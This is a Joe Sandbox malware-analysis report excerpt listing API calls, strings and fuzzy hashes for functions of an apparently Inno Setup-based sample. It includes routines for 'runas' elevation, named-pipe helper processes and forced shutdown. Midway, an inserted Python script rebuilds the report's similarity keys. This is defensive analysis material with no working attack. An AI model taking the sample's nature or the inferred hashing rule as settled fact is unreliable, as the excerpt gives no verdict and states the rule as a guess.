• KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00450C2B,00000000), ref: 0042CCFB
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
APIs
• SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
APIs
• SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
  • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
APIs
• SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                              • Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
                                                                              • Opcode Fuzzy Hash: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                              • Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,0045268D), ref: 0045266F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1452528299-0
                                                                              • Opcode ID: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                              • Instruction ID: 0a85f8cb76b48f87276e85e1927624e59cb24adfaf40460ac6081df001af0a23
                                                                              • Opcode Fuzzy Hash: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                              • Instruction Fuzzy Hash: BD0170356046446F8B10DF699C404EEF7F8DB4A3207208277FC64D3352DB745D099664
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,?,00004000,?,?,?,000023E4,000063E7,00401973), ref: 00401766
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                              • Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
                                                                              • Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                              • Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                              • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                              • Opcode Fuzzy Hash: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                                • Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75
                                                                              • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                              • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                              • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                              • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
                                                                              • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
                                                                              • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
                                                                              • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
                                                                              • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
                                                                              • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
                                                                              • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoadVersion
                                                                              • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                              • API String ID: 1968650500-2910565190
                                                                              • Opcode ID: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                              • Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
                                                                              • Opcode Fuzzy Hash: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                              • Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00457D4F
                                                                              • QueryPerformanceCounter.KERNEL32(02113858,00000000,00457FE2,?,?,02113858,00000000,?,004586DE,?,02113858,00000000), ref: 00457D58
                                                                              • GetSystemTimeAsFileTime.KERNEL32(02113858,02113858), ref: 00457D62
                                                                              • GetCurrentProcessId.KERNEL32(?,02113858,00000000,00457FE2,?,?,02113858,00000000,?,004586DE,?,02113858,00000000), ref: 00457D6B
                                                                              • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
                                                                              • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02113858,02113858), ref: 00457DEF
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E37
                                                                              • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457F8D,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E70
                                                                                • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F19
                                                                              • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457F4F
                                                                              • CloseHandle.KERNEL32(000000FF,00457F94,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F87
                                                                                • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                              • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                              • API String ID: 770386003-3271284199
                                                                              • Opcode ID: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                              • Instruction ID: c70edaa48864fe3754a193870ded2551bb9409a03b77fa183b8e4c23b8ad21c8
                                                                              • Opcode Fuzzy Hash: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                              • Instruction Fuzzy Hash: 66712270A043449EDB10DB69DC45B9EBBF5AB05705F1084BAF908FB283DB7859488F69
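The "API ID" and "String ID" fields in the Similarity sections above are the textual keys Joe Sandbox uses to match a function against functions seen in other samples; the report shows the values but not how they are derived. The script below is an added example, not Joe Sandbox code: it rebuilds both fields from an "APIs" listing using a rule inferred from the records on this page (split each API name into CamelCase tokens, drop tokens shorter than four characters such as Get, Set, Ex, A, Id, Msg, For, count tokens across the listing including "Part of subcall function" entries, group by descending count, sort within each group, join groups with "$"; strings are sorted in byte order and joined with "$"). The sample listing is copied from the record for the function at 00457D4F with argument lists shortened. The numeric "API String ID" is a hash the page does not document and is not reproduced. An analyst can use this to compute comparable keys for functions in their own disassembly and look them up against the report's values.

```python
"""Rebuild Joe Sandbox 'API ID' / 'String ID' similarity keys from an API listing.

The token rule is inferred from the report records and is an assumption; it
matches every record on this page but has only been checked against the API
names seen here (it does not, for example, settle how names with upper-case
runs such as WSAStartup are tokenised).
"""
import re
from collections import Counter

# One CamelCase token: an upper-case letter followed by lower-case letters.
TOKEN_RE = re.compile(r"[A-Z][a-z]*")

# One line of a report 'APIs' listing, e.g.
#   • CreateFileA.KERNEL32(00000000,C0000000), ref: 00457E37
#   • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?), ref: 0042D8A3
API_LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"([A-Za-z_][A-Za-z0-9_]*)\.[A-Z0-9]+"
)

MIN_TOKEN_LEN = 4  # inferred: Get/Set/Ex/A/Id/As/Msg/For never appear in an API ID


def api_tokens(api_name):
    """CamelCase tokens of an API name that are long enough to be kept."""
    return [t for t in TOKEN_RE.findall(api_name) if len(t) >= MIN_TOKEN_LEN]


def api_id(api_names):
    """Build the 'API ID' field: token groups by descending count, '$'-separated."""
    counts = Counter(tok for name in api_names for tok in api_tokens(name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def string_id(strings):
    """Build the 'String ID' field: referenced strings in byte order, '$'-separated."""
    return "$".join(sorted(strings))


def parse_api_listing(text):
    """Extract API names, in order, from a report 'APIs' listing (subcalls included)."""
    names = []
    for line in text.splitlines():
        m = API_LINE_RE.match(line)
        if m:
            names.append(m.group(1))
    return names


# Constructed input: the listing of the function at 00457D4F from this report,
# with argument lists shortened.
LISTING_00457D4F = """\
• GetTickCount.KERNEL32 ref: 00457D4F
• QueryPerformanceCounter.KERNEL32(02113858,00000000,00457FE2), ref: 00457D58
• GetSystemTimeAsFileTime.KERNEL32(02113858,02113858), ref: 00457D62
• GetCurrentProcessId.KERNEL32(?,02113858,00000000), ref: 00457D6B
• CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001), ref: 00457DE1
• GetLastError.KERNEL32(00000000,40080003), ref: 00457DEF
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003), ref: 00457E37
• SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000), ref: 00457E70
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
• CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000001,0C000000), ref: 00457F19
• CloseHandle.KERNEL32(?,00000000), ref: 00457F4F
• CloseHandle.KERNEL32(000000FF,00457F94), ref: 00457F87
  • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D), ref: 00452AFF
"""


def rebuild_00457D4F():
    """API ID of the named-pipe helper function, as it should appear in the report."""
    return api_id(parse_api_listing(LISTING_00457D4F))


if __name__ == "__main__":
    print(rebuild_00457D4F())
```

The key is deliberately lossy: argument values, call order and module names are discarded, so two functions that call the same set of APIs the same number of times collide even when they differ in everything else. That is why the report pairs it with the opcode and instruction fuzzy hashes; treat an API ID match on its own as a hint, not as a function identification.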
                                                                              APIs
                                                                                • Part of subcall function 00476E18: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                                • Part of subcall function 00476E18: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                                • Part of subcall function 00476E18: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                                • Part of subcall function 00476E18: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 00476E74
                                                                                • Part of subcall function 00476E18: CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                                • Part of subcall function 00476EF0: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476F82,?,?,?,02112BD8,?,00476FE4,00000000,004770FA,?,?,-00000010,?), ref: 00476F20
                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00477034
                                                                              • GetLastError.KERNEL32(00000000,004770FA,?,?,-00000010,?), ref: 0047703D
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0047708A
                                                                              • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004770AE
                                                                              • CloseHandle.KERNEL32(00000000,004770DF,00000000,00000000,000000FF,000000FF,00000000,004770D8,?,00000000,004770FA,?,?,-00000010,?), ref: 004770D2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                              • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                              • API String ID: 883996979-221126205
                                                                              • Opcode ID: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                              • Instruction ID: 1ba95e0e0868ac7cc54db30065146fef24764d75c8f79a60f30d4c8031701125
                                                                              • Opcode Fuzzy Hash: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                              • Instruction Fuzzy Hash: 6F3162B0A04648AADB10EFAAC841ADEB7B9EF05314F90843BF508F7382D77C59048B59
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                              • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1631623395-0
                                                                              • Opcode ID: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                              • Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
                                                                              • Opcode Fuzzy Hash: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                              • Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 004183A3
                                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                              • GetWindowRect.USER32(?), ref: 004183DC
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                              • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                              • ScreenToClient.USER32(00000000), ref: 00418408
                                                                              • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                              • String ID: ,
                                                                              • API String ID: 2266315723-3772416878
                                                                              • Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                              • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                              • Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                              • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 00454B0F
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B15
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B55
                                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B5A
                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
